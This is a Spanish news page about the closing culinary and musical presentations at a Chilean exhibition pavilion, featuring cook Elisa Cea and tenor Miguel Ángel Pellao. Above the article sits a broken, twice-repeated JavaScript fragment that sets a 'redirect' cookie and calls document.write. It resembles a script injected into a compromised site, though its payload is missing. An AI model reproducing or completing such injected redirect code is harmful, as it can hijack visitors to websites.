=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

El talento de Biobío y el sabor de la Araucanía cerraron las presentaciones en el pabellón chileno

10 Nov 2015

Compartir:

Uno de los sellos reconocidos de “El Amor de Chile” en sus 26 semanas de apertura al público, fueron la calidad y variedad de presentaciones artísticas y gastronómicas que mostraron un resumen de lo que es hoy nuestro país, su gente y territorio.

La encargada de cerrar las presentaciones culinarias fue Elisa Cea, repostera de Curarrehue, Región de la Araucanía, quien mostró una variada gama de platos basados en los principales frutos de su zona, tales como piñones, maquis, nalcas, lleuques,  moras, entre otros.

Junto a su hermana Patricia, supieron captar la atención del público internacional a través de un cooking show que rescataban su conexión con la cultura mapuche,  la importancia del piñón y de la Araucaria en su comunidad, transmitiendo el amor por su tierra, el cuidado por los productos y la cocina 100% natural.

Para Elisa, la cocina representa “la vida, cariño, entrega, agradecimiento eterno por todo lo que generosamente nos entrega día a día nuestra madre naturaleza”. Gracias a su arte culinario, ha viajado por sitios tan lejanos como Londres, Irlanda del Sur, Italia, Brasil y Perú; experiencia que se complementa a sus emprendimientos “Pastelería Pucón”, en Rancagua y Temuco, además de  “La Cocina de Elisa” en Curarrehue.

Por otro lado, el talento del tenor pehuenche Miguel Ángel Pellao, llenó de aplausos el escenario del pabellón, a través de un repertorio lírico de temas latinoamericanos. Miguel Ángel comenzó su viaje por la música durante su paso en el internado para niños indígenas Padre Remigio Gúbaro, siendo becado para estudiar en el Conservatorio Vivaldi de Concepción.

“Siempre he dicho que soy un bendecido de la vida, de poder encontrarme con gente que se enamora de mi voz. El año 2006 me fui a Pescara, Italia, donde estuve perfeccionándome por más de seis años”.

Respecto a su participación en el Pabellón chileno, indicó que “ha sido muy interesante y bonito. La recepción con la gente ha sido muy buena y escogimos un repertorio no solo para los italianos, sino que también para el público latino”, indicó.

Revisa la galería de fotos AQUÍ

Partners

Media Partner